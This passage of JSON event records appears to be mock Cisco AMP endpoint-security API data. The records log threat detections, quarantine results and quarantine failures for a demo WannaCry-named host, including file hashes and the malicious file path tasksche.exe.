Failure","event_type_id":2164260880,"detection_id":"6419229335730782275","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":368000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782274","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":134000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782273","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":102000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782272","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":102000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782271","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814972","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":773000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":648000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":570000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":414000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782275","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":368000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782274","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":134000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782273","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782272","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782271","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":884000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814968","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847671","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847670","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847667","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 